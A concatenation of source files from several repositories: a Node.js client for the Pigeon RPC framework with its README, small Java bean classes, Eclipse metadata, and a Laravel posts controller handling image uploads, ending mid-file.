function weights(context, ips, done) {
logger.debug('Zookeeper weights subscription: all servers(%s), service(%s).',
ips, context.service.url);
var oldips = _.keys(context.service.router.status);
_.difference(oldips, ips).forEach(function(ip) {
delete context.service.router.status[ip];
});
var newips = _.difference(ips, oldips);
newips.forEach(function(ip) {
context.service.router.status[ip] = {
loadBalance : 0.5,
reachability: 0.5
};
});
logger.debug('Zookeeper weights subscription: service(%s), new servers(%s).',
newips, context.service.url);
async.each(
newips,
function(ip, eachdone) {
weight(context, ip, eachdone);
},
function(err) {
done(err);
}
);
}
function weight(context, ip, eachdone) {
logger.info('Zookeeper weight subscription: start weight subscription, ' +
'server(%s), service(%s).', ip, context.service.url);
var path = weightPath(ip);
logger.debug('Zookeeper weight subscription: node(%s), server(%s), service(%s).',
path, ip, context.service.url);
g_zk.exists(
path,
function(event) {
var name = event.getName();
switch(name) {
case 'NODE_CREATED':
logger.info('Zookeeper weight subscription: event(%s), node(%s), ' +
'server(%s), service(%s).', name, path, ip, context.service.url);
weight(context, ip, function(err) {
if (err) {
logger.error(err);
}
});
break;
default:
logger.debug('Zookeeper weight subscription(*): event(%s), node(%s), ' +
'server(%s), service(%s).', name, path, ip, context.service.url);
}
},
function(err, stat) {
if (err) {
return eachdone(new Error('zookeeper', 'Zookeeper weight ' +
'subscription: error(%s), node(%s), server(%s), service(%s).',
err, path, ip, context.service.url));
}
if (!stat) {
return eachdone();
}
g_zk.getData(
path,
function(event) {
var name = event.getName();
switch(name) {
case 'NODE_DATA_CHANGED':
logger.info('Zookeeper weight subscription: event(%s), node(%s), ' +
'server(%s), service(%s).', name, path, ip, context.service.url);
weight(context, ip, function(err) {
if (err) {
logger.error(err);
}
});
break;
default:
logger.debug('Zookeeper weight subscription(*): event(%s), node(%s), ' +
'server(%s), service(%s).', name, path, ip, context.service.url);
}
},
function(err, data, stat) {
if (err) {
return eachdone(new Error('zookeeper', 'Zookeeper weight ' +
'subscription: error(%s), node(%s), server(%s), service(%s).',
err, path, ip, context.service.url));
}
if (!stat) {
return eachdone(new Error('zookeeper', 'Zookeeper weight ' +
'subscription: error(%s), node(%s), server(%s), service(%s).',
'node not found', path, ip, context.service.url));
}
var weight = (data && data.toString()) ? parseInt(data.toString()) : 0.5;
logger.info('Zookeeper weight subscription: data(%j), node(%s), ' +
'server(%s), service(%s).', weight, path, ip, context.service.url);
if (context.service.router.status[ip]) {
context.service.router.status[ip].loadBalance = weight;
}
eachdone();
}
);
}
);
}
function serverPath(context, url) {
return SERVER_PATH + PATH_SEPARATOR
+ escape(context.registry.PROTOCOL_PREFIX + url);
}
function weightPath(ip) {
return WEIGHT_PATH + PATH_SEPARATOR + ip;
}
function escape(str) {
return str.replace(new RegExp(PATH_SEPARATOR, 'g'), PLACEHOLDER);
}
function whichRegistry(configs) {
var protocol = configs.get('protocol');
switch(protocol) {
case 'tcp' : return tcpRegistry;
case 'http': return httpRegistry;
default:
logger.fatal('Unsupported protocol: %j.', protocol);
}
}
module.exports = Registry;
<file_sep>var winston = require('winston')
, util = require('util')
;
/*
*
* Constants.
*
*/
var packagename = 'node-pigeon';
winston.cli();
var logger = new (winston.Logger)({
transports: [
new (winston.transports.Console)({
level : 'info',
handleException: true,
json : false,
colorize : true
})
],
exitOnError: false
});
logger.cli();
module.exports = function createLogger(modulename) {
modulename = '[' + modulename + ']';
return {
debug: function() {
logger.debug(packagename, modulename,
util.format.apply(util, arguments));
},
info: function() {
logger.info(packagename, modulename,
util.format.apply(util, arguments));
},
warn: function() {
logger.warn(packagename, modulename,
util.format.apply(util, arguments));
},
error: function() {
logger.error(packagename, modulename,
util.format.apply(this, arguments));
},
fatal: function() {
logger.error(packagename, modulename,
util.format.apply(this, arguments),
function() {
process.exit(1);
}
);
}
};
};
<file_sep>'use strict';
require('rootpath');
var _ = require('underscore');
/*
*
* Constants.
*
*/
var PRIMITIVES = [
'int',
'long',
'double',
'boolean',
'java.lang.Integer',
'java.lang.Long',
'java.lang.Double',
'java.lang.Boolean',
'java.lang.String',
'java.util.Date'
];
function check(javaObject) {
if (javaObject['$err']) {
return javaObject['$err'];
}
if (_.contains(PRIMITIVES, javaObject['$class'])) {
return null;
}
var err = null;
_.each(javaObject['$'], function(field) {
var fielderr = check(field);
if (fielderr && !err) {
err = fielderr;
}
});
return err;
}
function isJava(javaObject) {
if (javaObject['$err']) {
return javaObject['$err'];
}
if (_.contains(PRIMITIVES, javaObject['$class'])) {
return true;
}
var err;
var result = _.every(javaObject['$'], function(i) {
var result = isJava(i);
if (result === true) {
return true;
} else {
err = result;
return false;
}
});
if (result === true) {
return true;
} else {
return err;
}
}
/**
* int.
* MIN_INT <= int < MAX_INT
*/
var MAX_INT = +Math.pow(2, 31)
, MIN_INT = -Math.pow(2, 31)
;
function isint(jsObject) {
return _.isNumber(jsObject) && jsObject % 1 === 0
&& jsObject >= MIN_INT && jsObject < MAX_INT;
}
/**
* long.
* MIN_LONG <= long < MAX_LONG
*/
var MAX_LONG = +Math.pow(2, 63)
, MIN_LONG = -Math.pow(2, 63)
;
function islong(jsObject) {
return _.isNumber(jsObject) && jsObject % 1 === 0
&& jsObject >= MIN_LONG && jsObject < MAX_LONG;
}
/**
* double.
*/
function isdouble(jsObject) {
return _.isNumber(jsObject)
}
/**
* boolean.
*/
function isboolean(jsObject) {
return _.isBoolean(jsObject);
}
/**
* java.lang.Integer.
*/
function isInteger(jsObject) {
return isint(jsObject);
}
/**
* java.lang.Long.
*/
function isLong(jsObject) {
return islong(jsObject);
}
/**
* java.lang.Double.
*/
function isDouble(jsObject) {
return isdouble(jsObject);
}
/**
* java.lang.Boolean.
*/
function isBoolean(jsObject) {
return isboolean(jsObject);
}
/**
* java.lang.String.
*/
function isString(jsObject) {
return _.isString(jsObject);
}
/**
* java.lang.Object.
*/
function isObject(jsObject) {
return _.isObject(jsObject) && !_.isArray(jsObject) && !_.isFunction(jsObject);
}
/**
* user defined.
*/
function isClass(jsObject) {
return isObject(jsObject);
}
/**
* java.util.Date.
*/
function isDate(jsObject) {
return _.isDate(jsObject);
}
/**
* array.
*/
function isarray(jsObject) {
return _.isArray(jsObject);
}
/**
* java.util.List.
*/
function isList(jsObject) {
return _.isArray(jsObject);
}
/**
* java.util.Map.
*/
function isMap(jsObject) {
return isObject(jsObject);
}
module.exports = {
check : check,
isint : isint,
islong : islong,
isdouble : isdouble,
isboolean: isboolean,
isInteger: isInteger,
isLong : isLong,
isDouble : isDouble,
isBoolean: isBoolean,
isString : isString,
isObject : isObject,
isClass : isClass,
isDate : isDate,
isarray : isarray,
isList : isList,
isMap : isMap
};<file_sep>'use strict';
require('rootpath')();
var logger = require('lib/logger')('serializer')
, hessian = require('lib/serializer/hessian')
, json = require('lib/serializer/json')
, protobuf = require('lib/serializer/protobuf')
;
function Serializer(service) {
this.service = service;
this.serializer = whichSerializer(service.configs);
this.SERIALIZE_ID = this.serializer.SERIALIZE_ID;
this.URL_FIELD = this.serializer.URL_FIELD;
this.RESULT_FIELD = this.serializer.RESULT_FIELD;
}
Serializer.prototype.serialize = function serialize(body) {
try {
return this.serializer.serialize(body);
}
catch(err) {
throw err;
}
};
Serializer.prototype.deserialize = function deserialize(body) {
try {
return this.serializer.deserialize(body);
}
catch(err) {
throw err;
}
};
function whichSerializer(config) {
var serialize = config.get('serialize');
switch(serialize) {
case 'hessian' : return hessian;
case 'json' : return json;
case 'protobuf': return protobuf;
default:
logger.fatal('Unsupported serialize: %j.', serialize);
}
}
module.exports = Serializer;
<file_sep>'use strict';
require('rootpath');
var hessian = require('lib/serializer/hessian/');
/*
*
* Constants.
*
*/
var SERIALIZE_ID = 2
, URL_FIELD = 'serviceName'
, RESULT_FIELD = 'returnVal'
;
function serialize(body) {
body = {
$class: 'com.dianping.dpsf.protocol.DefaultRequest',
$: body
};
try {
return hessian.encode(body, '2.0');
}
catch(err) {
throw err;
}
}
function deserialize(body) {
try {
return hessian.decode(body, '2.0');
}
catch(err) {
throw err;
}
}
module.exports = {
SERIALIZE_ID: SERIALIZE_ID,
URL_FIELD : URL_FIELD,
RESULT_FIELD: RESULT_FIELD,
serialize : serialize,
deserialize : deserialize
};
<file_sep>'use strict';
require('rootpath')();
var _ = require('underscore')
, parser = require('properties-parser')
, logger = require('lib/logger')('config')
;
/*
*
* Constants.
*
*/
var ENV_PATH = '/data/webapps/appenv'
, TIMEOUT = 2000
, RETRIES = 1
, PROTOCOLS = ['http']
, SERIALIZES = ['hessian']
, LOADBALANCES = ['autoaware', 'roundRobin', 'random']
;
/*
*
* Globals.
*
*/
var g_zkserver = [];
(function init() {
try {
var properties = parser.read(ENV_PATH);
}
catch(err) {
logger.warn('Reading `appenv` error: %j.', err);
}
if (!properties['zkserver']) {
return logger.warn('No zookeeper address supplied in `appenv`.');
}
g_zkserver = properties['zkserver'];
}());
function Config(configs) {
configs = configs || {};
this.zkserver = config('zkserver' , configs.zkserver );
this.timeout = config('timeout' , configs.timeout );
this.retries = config('retries' , configs.retries );
this.protocol = config('protocol' , configs.protocol );
this.serialize = config('serialize' , configs.serialize );
this.loadBalance = config('loadBalance', configs.loadBalance);
}
Config.prototype.get = function(name) {
return this[name];
};
function config(name, value) {
switch(name) {
case 'zkserver':
if (!value) {
value = g_zkserver;
}
if (value) {
return value;
} else {
logger.fatal('No zookeeper address supplied.');
}
break;
case 'timeout':
return value || TIMEOUT;
case 'retries':
return value || RETRIES;
case 'protocol':
if (!value) {
return PROTOCOLS[0];
}
if (_.contains(PROTOCOLS, value)) {
return value;
}
logger.fatal('Unsupported %s: %j.', name, value);
break;
case 'serialize':
if (!value) {
return SERIALIZES[0];
}
if (_.contains(SERIALIZES, value)) {
return value;
}
logger.fatal('Unsupported %s: %j.', name, value);
break;
case 'loadBalance':
if (!value) {
return LOADBALANCES[0];
}
if (_.contains(LOADBALANCES, value)) {
return value;
}
logger.fatal('Unsupported %s: %j.', name, value);
break;
default:
logger.warn('Unsupported config :%s.', name);
}
}
module.exports = Config;
<file_sep>'use strict';
require('rootpath')();
/*
*
* Constants.
*
*/
var PROTOCOL_PREFIX = '@HTTP@';
module.exports = {
PROTOCOL_PREFIX: PROTOCOL_PREFIX
};
<file_sep># node-pigeon-client
This module is designed to resemble the Pigeon Java client API but with tweaks to follow the convention of Node.js modules. Develops that are familiar with the Pigeon Java client would be able to pick it up quickly.
This module has been tested to work with Pigeon version 2.3.10.
## Getting Started
1. Install node.
2. Install node-pigeon-client using npm:
``` bash
$ npm install node-pigeon-client --save
```
3. An environment configuration file `/data/webapps/appenv` should be provided in the given format
```
deployenv = qa # Environment.
zkserver = 127.0.0.1:2181 # Zookeeper host and port.
```
## Example
Remote service "EchoService":
```java
public class EchoService {
public int hello(int a) {
return a;
}
}
```
Call the remote service "EchoService":
```javascript
var pigeon = require('node-pigeon-client');
var java = require('node-pigeon-client').java;
var url = 'EchoService'; // Remote service url.
pigeon.getService(url, function(err, service) {
if (err) {
return console.log('Get remote service error: %s.', err);
}
service.hello(java.int(123456), function(err, result) {
if (err) {
return console.log('Call remote service method error: %s.', err);
}
// Output 123456 to the console.
console.log('Remote service method result: %d.', result);
});
});
```
## Documentation
#### getService(url, [options], callback)
Retrieve the service of the given url.
**Arguments**
* url `String` - The service url.
* options `Object` - An object to set the service retrive options. Currently
available options are:
* `zkserver`: Comma seperated `host:port` pairs, each represents a Zookeeper
server. e.g.
```javascript
'127.0.0.1:2181, 127.0.0.1:2182, 127.0.0.1:2183'
```
* `timeout` Remote service method call timeout in milliseconds.
* `protocol` Protocol of remote service method call.
* `serialize` Serailization of network transmission.
* `timeoutRetry` Whether to retry when timeout.
* `retries` The number of retry attempts for timeout.
* `loadBalance` Type of remote service server load balance.
Default options:
```javascript
{
zkserver : '127.0.0.1:2181' // Can also set in '/data/webapps/appenv'.
timeout : 1000,
protocol : 'http' // http.
serialize : 'hessian' // hessian.
timeoutRetry: true // true/false
retries : 1
loadBalance : 'autoaware' // autoaware/roundRobin/random
}
```
* callback(err, service) `Function` - The callback function. The `service` can
be regarded as an object containing all the service methods that can be
called.
## Java Types Supported
* null
* int
* long
* double
* boolean
* java.lang.Integer
* java.lang.Long
* java.lang.Double
* java.lang.Boolean
* java.lang.String
* java.lang.Object
* java.util.List
* java.util.Set
* java.util.Date
* array
* user-defined
#### java.null()
**Example**
```java
Object a = null;
```
```javascript
var a = java.null()
```
#### java.int(jsNumber)
**Example**
```java
int a = 123;
```
```javascript
var a = java.int(123);
```
#### java.long(jsNumber)
**Example**
```java
long a = 123;
```
```javascript
var a = java.long(123);
```
#### java.double(jsNumber)
**Example**
```java
double a = 1.23;
```
```javascript
var a = java.double(1.23);
```
#### java.boolean(jsBoolean)
**Example**
```java
boolean a = true;
```
```javascript
var a = java.boolean(true);
```
#### java.Integer(jsNumber)
**Example**
```java
java.lang.Integer a = new java.lang.Integer(123);
```
```javascript
var a = java.Integer(123);
```
#### java.Long(jsNumber)
**Example**
```java
java.lang.Long a = new java.lang.Long(123);
```
```javascript
var a = java.Long(123);
```
#### java.Double(jsNumber)
**Example**
```java
java.lang.Double a = new java.lang.Double(1.23);
```
```javascript
var a = java.Double(1.23);
```
#### java.Boolean(jsBoolean)
**Example**
```java
java.lang.Boolean a = new java.lang.Boolean(true);
```
```javascript
var a = java.Boolean(true);
```
#### java.String(jsString)
**Example**
```java
java.lang.String a = new java.lang.String('123');
```
```javascript
var a = java.String('123');
```
#### java.Object(jsObject)
**Example**
```java
public Class Car {
private String name;
private int money;
private ArrayList<Integer> wheelSize = new ArrayList<Integer>();
public Car(name, money, wheelSize) {
this.name = name;
this.money = money;
this.wheelSize = wheelSize;
}
}
java.lang.Object a = new Car("Benz", 123, new ArrayList([1, 2, 3, 4]));
```
```javascript
var a = java.Object({
name : java.String('Benz'),
money : java.int(123),
wheelSize: java.List.Integer([1, 2, 3, 4])
});
```
#### java.List.Generics(jsArray)
`Generics` represents the following types:
* int
* long
* double
* boolean
* java.lang.Integer
* java.lang.Long
* java.lang.Double
* java.lang.Boolean
* java.lang.String
* java.lang.Object
* java.util.Date
* user-defined
**Example**
```java
List<String> a = new ArrayList(["a", "b", "c"]);
```
```javascript
var a = java.List.String(['a', 'b', 'c']);
```
#### java.Set.Generics(jsArray)
See java.List.Generics(jsArray).
#### java.array.Generics(jsArray)
See java.List.Generics(jsArray).
#### java.Date(jsDate)
**Example**
```java
java.util.Date a = new java.util.Date();
```
```javascript
var a = java.Date(new Date());
```
#### java.Class(classname, jsObject)
**Example**
```java
package packagename;
public Class Car {
private String name;
private int money;
private ArrayList<Integer> wheelSize = new ArrayList<Integer>();
public Car(name, money, wheelSize) {
this.name = name;
this.money = money;
this.wheelSize = wheelSize;
}
}
packagename.Car a = new packagename.Car("Benz", 123, new ArrayList([1, 2, 3, 4]));
```
```javascript
var a = java.Class('packagename.Car', {
name : java.String('Benz'),
money : java.int(123),
wheelSize: java.List.Integer([1, 2, 3, 4])
})
```
<file_sep>'use strict';
require('rootpath')();
var util = require('util');
function Error(type) {
this.type = type;
this.info = util.format.apply(util, Array.prototype.slice.call(arguments, 1));
}
module.exports = Error;
<file_sep>'use strict';
/**
* HttpConnector.
* This module is designed to make http post request to the server for network
* probe or remote service call.
*
* Module relationship:
* Connector = HttpConnector || TcpConnector
*/
require('rootpath')();
var _ = require('underscore')
, request = require('request')
, Error = require('lib/error')
, logger = require('lib/logger')('httpConnector')
, serializer = require('lib/serializer/')
;
function HttpConnector(service) {
this.service = service;
}
HttpConnector.prototype.connect =
function connect(hostport, method, params, cb) {
(arguments.length === 4)
? rpcConnect(this, hostport, method, params, cb)
: probeConnect(this, hostport, method);
};
function rpcConnect(context, hostport, method, params, cb) {
logger.debug('RPC connection: service(%s), hostport(%s), method(%s)' +
', params(%j).', context.service.url, hostport, method, params);
var body = {
serialize : context.service.serializer.SERIALIZE_ID,
methodName : method,
parameters : params
};
body[context.service.serializer.URL_FIELD] = context.service.url;
try {
body = context.service.serializer.serialize(body);
}
catch(err) {
// RAW ERROR!
return _.defer(function() { cb(new Error('Serialization', err)); });
}
var options = {
uri : 'http://' + hostport + '/service?serialize='
+ context.service.serializer.SERIALIZE_ID,
encoding: null,
timeout : context.service.configs.get('timeout'),
body : body
};
logger.debug('RPC connection: service(%s), request options(%j).',
context.service.url, options);
request.post(options, function(err, response, body) {
if (err) {
// RAW ERROR!
return cb(new Error('Network', err));
}
if (response.statusCode !== 200) {
// RAW ERROR!
return cb(new Error('Server', 'Status code: %d', response.statusCode));
}
try {
body = context.service.serializer.deserialize(body);
}
catch(err) {
// RAW ERROR!
return cb(new Error('Deserialization', err));
}
var result = body[context.service.serializer.RESULT_FIELD];
if (result && result['message']) {
// RAW ERROR!
return cb(new Error('Server', result['message']));
}
cb(null, result);
});
}
function probeConnect(context, hostport, cb) {
logger.debug('Probe connection: service(%s), hostport(%s).',
context.service.url, hostport);
var options = {
uri : 'http://' + hostport + '/service?serialize='
+ context.service.serializer.SERIALIZE_ID,
encoding: null,
timeout : context.service.configs.get('timeout')
};
logger.debug('Probe connection: service(%s), hostport(%s).',
context.service.url, hostport);
request.post(options, function(err, response) {
if (err) {
// RAW ERROR!
return cb(new Error('Network', err));
}
if (response.statusCode !== 200) {
// RAW ERROR!
return cb(new Error('Server', 'Status code: %d', response.statusCode));
}
});
}
module.exports = HttpConnector;
<file_sep>'use strict';
/**
* Prober.
* This module is designed to probe the network connection between Pigeon
* server and client. The prober will be triggered if the service router
* finds too little available server IPs.
*
* Module relationships:
* Router ---> Prober
*/
require('rootpath')();
var _ = require('underscore')
, async = require('async')
, logger = require('lib/logger')('prober')
;
function Prober(service) {
this.service = service;
}
Prober.prototype.probe = function probe(done) {
logger.debug('Probe: start probe, router status(%j), service(%s).',
this.service.router.status, this.service.url);
var that = this;
async.each(
this.service.router.probes(),
function(ip, eachdone) {
that.service.connector.connect(ip, function(err) {
that.service.router.status[ip].reachability
= (_.isEqual(err.type, 'Network')) ? 0 : 1;
eachdone();
});
},
function() {
logger.debug('Probe: end probe, router status(%j), service(%s).',
that.service.router.status, that.service.url);
done && done()
}
);
};
module.exports = Prober;
<file_sep>'use strict';
require('rootpath')();
var _ = require('underscore');
function next(router) {
var nexts = router.nexts();
return _.isEmpty(nexts) ? null : _.sample(_.pairs(nexts))[0];
}
module.exports = {
next: next
};
<file_sep>'use strict';
/**
* Connector.
* This module is designed to make request to the server for network probe or
* remote service call.
*
* Module relationships:
* (Prober, Reflector) ---> Connector ---> Serializer
*/
require('rootpath')();
var logger = require('lib/logger')
, TcpConnector = require('lib/connector/tcp')
, HttpConnector = require('lib/connector/http')
;
function Connector(service) {
this.service = service;
this.connector = new (whichConnector(service.configs))(service);
}
Connector.prototype.connect
= function connect(hostport, method, params, cb) {
arguments.length === 4
? this.connector.connect(hostport, method, params, cb)
: this.connector.connect(hostport, method);
};
function whichConnector(configs) {
var protocol = configs.get('protocol');
switch(protocol) {
case 'tcp' : return TcpConnector;
case 'http': return HttpConnector;
default:
logger.fatal('Unsupported protocol: %j.', protocol);
}
}
module.exports = Connector;
<file_sep>'use strict';
/**
* Reflector.
* This module is designed to reflect the remote service procedure call.
* All the remote service method call to the Pigeon server is wrapped here.
*
* Module relationships:
* Proxy ---> Reflector ---> Connector
*/
require('rootpath')();
var _ = require('underscore')
, async = require('async')
, Error = require('lib/error')
, logger = require('lib/logger')('reflect')
, type = require('lib/util/type')
;
function Reflector(service) {
this.service = service;
}
Reflector.prototype.reflect = function reflect(method) {
logger.debug('Reflect: service(%s), method(%s).',
this.service.url, method);
var that = this;
return function() {
var params = _.initial(arguments)
, cb = _.last (arguments)
;
logger.debug('RPC: start RPC, service(%s), method(%s), params(%j).',
that.service.url, method, params);
// Callback checking.
if (!cb || !_.isFunction(cb)) {
// FATAL ERR!
logger.fatal('Fatal error: A callback must be provided as the last ' +
'argument in service(%s) method(%s).',that.service.url, method);
}
// Parameter checking.
var errparam = _.find(params, function(param) {
return type.check(param) ? true : false;
});
if (errparam) {
_.defer(function() {
// TOP ERROR!
var toperr = new Error('top', 'Parameter error(%s), service(%s), ' +
'method(%s), params(%j).', type.check(errparam).info, that.service.url, method, params);
logger.error(toperr.info);
cb(toperr.info);
});
return;
}
var retries = that.service.configs.get('retries');
async.whilst(
function() {
return retries-- >= 0;
},
function(whilstdone) {
var ip = that.service.router.next();
if (!ip) {
_.defer(function() {
// TOP ERROR!
var toperr = new Error('top', 'Network error(%s), ' +
'service(%s), method(%s), params(%j).', 'No available servers',
that.service.url, method, params);
logger.error(toperr.info);
cb(toperr.info);
whilstdone(1);
});
} else {
that.service.connector.connect(ip, method, params, function(err, result) {
if (err && err.type === 'Network') {
that.service.router.status[ip].reachability = 0;
if (retries < 0) {
// TOP ERROR!
var toperr = new Error('top', 'Network error(%s), ' +
'service(%s), method(%s), params(%j).', err.info, that.service.url,
method, params);
logger.error(toperr.info);
cb(toperr.info);
return whilstdone(1);
}
return whilstdone();
}
that.service.router.status[ip].reachability = 1;
if (err) {
// TOP ERROR!
var toperr = new Error('top', '%s error(%s), service(%s), method(%s), ' +
'params(%j).', err.type, err.info, that.service.url, method, params);
logger.error(toperr.info);
cb(toperr.info);
return whilstdone(1);
}
cb(err, result);
return whilstdone(1);
});
}
},
function() {
logger.debug('RPC: end RPC, service(%s), method(%s), params(%j).',
that.service.url, method, params);
}
);
};
};
module.exports = Reflector;
| c1706564bb6ad9bcbc889375588c46cef83f5ac0 | [
"JavaScript",
"Markdown"
] | 15 | JavaScript | lixt/node-pigeon-client | e1ffe58c8ba1696f66f440a5d4dc9ced82ad3e8a | aea824c85cf1262fbb23e68392e72aaadae60b58 |
refs/heads/master | <file_sep>
@pets =[
{key:1, name: "Dog", price:10},
{key:2, name: "Cat", price:30},
{key:3, name: "Bird", price:20}
]
@options = [
{key:1, name: "View Pets"},
{key:2, name: "add Pet to cart"},
{key:3, name: "View Cart"},
{key:4, name: "Checkout"},
{key:5, name: "Remove Item"},
{key:6, name: "add pets to store"}
]
@cart =[]
def display_options
@options.each_with_index do | option, index|
puts " #{option[:key]}, #{option[:name]}"
end
end
def view_pets
@pets.each_with_index do | pet, index|
puts "#{pet[:key]}, Type:#{pet[:name]}, $#{pet[:price]}"
end
end
def add_pets
basket = {}
puts "What would you like to add?"
view_pets
selection = gets.chomp.to_i
basket[:name] = @pets[selection -1][:name]
basket[:price] = @pets[selection -1][:price]
@cart << basket
puts " You are getting #{basket}"
end
def adding_to_pets
puts "What do you want the name to be?"
new_name = gets.chomp
puts "What do you want the price to be?"
new_price = gets.chomp.to_i
new_pet ={
key: @pets.length + 1,
name:new_name,
price:new_price,
}
@pets << new_pet
end
def view_cart
@cart.each_with_index do | item, index|
puts "#{item[:name]}, #{item[:price]}"
end
end
def checkout
total = 0
@cart.each do |item|
total += item[:price].to_i
end
puts "the total is #{total}"
end
def remove_item
puts " What would you like to remove?"
delete_item = gets.chomp.to_i
@cart.delete_at(delete_item -1)
view_cart
end
def display_menu
puts "What would you like to do?"
display_options
choice = gets.chomp.to_i
case choice
when 1
view_pets
display_menu
when 2
add_pets
display_menu
when 3
view_cart
display_menu
when 4
view_cart
checkout
when 5
view_cart
remove_item
display_menu
when 6
adding_to_pets
display_menu
else
puts"good bye"
end
end
display_menu
<file_sep>
@animals = [
{key: 1 name:'cat', age: 10},
{key: 2 name: 'dog',age: 10},
{key: 3 name: 'bird',age: 10}
]
def display_animals
@animals.each_with_index do | animal, index|
puts "Name #{animal[:name]} Age #{animal[:age]}"
end
end
def add_animal(name, age)
animal = {
name: "#{name}",
age: "#{age}",
}
@animals << animal
end
def delete_animal
display_animals
puts " What aninmal would you like to delete?"
index = gets.chomp.to_i
puts "Are you sure?"
del_answer = gets.chomp
if del_answer == "y"
puts "delete #{index}"
@animals.delete_at(index)
else del_answer
menu_promp
end
end
def edit_name(index)
puts 'What name do you want to change?'
new_name = gets.chomp #1
@animals[index + 1][:name]=new_name
end
def edit_animal
display_animals
puts " What aninmal name would you like to change?"
index = gets.chomp.to_i
edit_name(index)
end
def menu_promp
puts " Start What would you like to do?"
answer = gets.chomp.to_i
case answer
when 1
puts "Whats the animals Name"
name = gets.chomp
puts "Whats the animals Age"
age = gets.chomp.to_i
add_animal(name,age)
menu_promp
when 2
display_animals
menu_promp
when 3
edit_animal
menu_promp
when 4
delete_animal
menu_promp
end
end
def menu_items
menu_promp
end
menu_items<file_sep>require "review"
vet | c115f595833c7e8206e71b7ebe8860d8772a7941 | [
"Ruby"
] | 3 | Ruby | sjohnston92/pt_pet_store | 43e66fb8438cc49f1020a7cf3270f0a858a40cfc | a620cdc80949b102f8d945ad08ca11abfad0ab6f |
refs/heads/master | <repo_name>marcoszillig/ouichefs<file_sep>/java/.metadata/version.ini
#Fri Sep 16 14:11:46 BRT 2016
org.eclipse.core.runtime=2
org.eclipse.platform=4.6.0.v20160606-1100
<file_sep>/java/Web_OuiChefs/src/br/com/ouichefs/beans/PratoPedido.java
package br.com.ouichefs.beans;
public class PratoPedido {
}
<file_sep>/java/Web_OuiChefs/src/br/com/ouichefs/beans/Orcamento.java
package br.com.ouichefs.beans;
public class Orcamento {
int vl_orcamento_pessoa;
String dt_validade_orcamento;
String dt_fechamento_orcamento;
public Orcamento(int vl_orcamento_pessoa, String dt_validade_orcamento, String dt_fechamento_orcamento) {
super();
this.vl_orcamento_pessoa = vl_orcamento_pessoa;
this.dt_validade_orcamento = dt_validade_orcamento;
this.dt_fechamento_orcamento = dt_fechamento_orcamento;
}
public Orcamento() {
super();
}
public int getVl_orcamento_pessoa() {
return vl_orcamento_pessoa;
}
public void setVl_orcamento_pessoa(int vl_orcamento_pessoa) {
this.vl_orcamento_pessoa = vl_orcamento_pessoa;
}
public String getDt_validade_orcamento() {
return dt_validade_orcamento;
}
public void setDt_validade_orcamento(String dt_validade_orcamento) {
this.dt_validade_orcamento = dt_validade_orcamento;
}
public String getDt_fechamento_orcamento() {
return dt_fechamento_orcamento;
}
public void setDt_fechamento_orcamento(String dt_fechamento_orcamento) {
this.dt_fechamento_orcamento = dt_fechamento_orcamento;
}
}
| d3cde68e243efc52ff6c3fccbc7ece70362334be | [
"Java",
"INI"
] | 3 | INI | marcoszillig/ouichefs | 52412a5ddfd6726f352096bdc23dec54f99b421f | dd790ab538391ea117c04436ab174043feb1649a |
refs/heads/main | <repo_name>Aca84/Picturinho<file_sep>/resources/js/app.js
require('./bootstrap');
includes('main.js');<file_sep>/resources/js/main.js
//do no why I make this file duno<file_sep>/app/Http/Controllers/PostsController.php
<?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Models\Post;
use App\Models\User;
use Illuminate\Support\Facades\Auth;
use Illuminate\Support\Facades\Storage;
use Illuminate\Support\Facades\File;
class PostsController extends Controller
{
/**
* Create a new controller instance.
*
* @return void
*/
public function __construct()
{
$this->middleware('auth', ['except'=>['index','show','search']]);
}
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function index()
{
// $user = auth()->user()->name; // User name for naming the image folder
$posts = Post::latest()->paginate(30); // This will return last created post on top
return view('posts.index')->with('posts', $posts);
}
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function search(Request $request)
{
// $request->validate(
// ['search'=>'required|min:1']
// );
$search = $request->input('searchQuery');
$posts = Post::where('title', 'like', "%$search%")->get();
return view('search')->with('posts', $posts);
}
/**
* Show the form for creating a new resource.
*
* @return \Illuminate\Http\Response
*/
public function create()
{
return view('posts.create');
}
/**
* Store a newly created resource in storage.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function store(Request $request)
{
$this->validate($request, [
'title' => 'required',
'body' => 'required',
// 'image' => 'image|nullable|mimes:jpeg,png,jpg,gif,svg|max:2048'
'image' => 'nullable|mimes:jpeg,png,jpg,gif,svg|max:2048'
]);
$user = auth()->user()->name; // User name for naming the image folder
// Check if request has image in form
if ($request->hasFile('image')) {
// Working upload shorter
$fileNameToStore = $request->file('image')->getClientOriginalName();
// $path = $request->file('image')->storeAs('public/images', $fileNameToStore); // All images in one folder
$path = $request->file('image')->storeAs('public/images/'.$user, $fileNameToStore); // For every user create user(name) folder
}else{
$fileNameToStore = 'noimage.jpg';
}
// Create post
$post = new Post;
$post->title = $request->input('title');
$post->body = $request->input('body');
$post->user_id = auth()->user()->id;
$post->image = $fileNameToStore;
$post->save();
return redirect('/posts')->with('success', 'You have successfully crated a post.');
}
/**
* Display the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function show($id)
{
$posts = Post::find($id);
return view('posts.show')->with('posts',$posts);
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function edit($id)
{
$posts = Post::find($id);
// Check admin auth
// if (Auth::user()->role == 'admin') {
// return view('posts/edit')->with('posts',$posts);
// }
// Check for correct user
if(Auth::user()->id !== $posts->user_id && Auth::user()->role !== 'admin'){
return redirect('/posts')->with('error', 'Nije moguce');
}
return view('posts/edit')->with('posts',$posts);
}
/**
* Update the specified resource in storage.
*
* @param \Illuminate\Http\Request $request
* @param int $id
* @return \Illuminate\Http\Response
*/
public function update(Request $request, $id)
{
$this->validate($request, [
'title' => 'required',
'body' => 'required',
'image' => 'nullable|mimes:jpeg,png,jpg,gif,svg|max:2048'
]);
// Check if request has image in form
$user = auth()->user()->name; // What user it is
if ($request->hasFile('image')) {
$fileNameToStore = $request->file('image')->getClientOriginalName();
$path = $request->file('image')->storeAs('public/images/'.$user, $fileNameToStore);
}
// Update post
$post = Post::find($id);
$post->title = $request->input('title');
$post->body = $request->input('body');
if ($request->hasFile('image')) {
$post->image = $fileNameToStore;
}
$post->save();
return redirect('/posts')->with('success', 'Updated!');
}
/**
* Remove the specified resource from storage.
*
* @param int $id
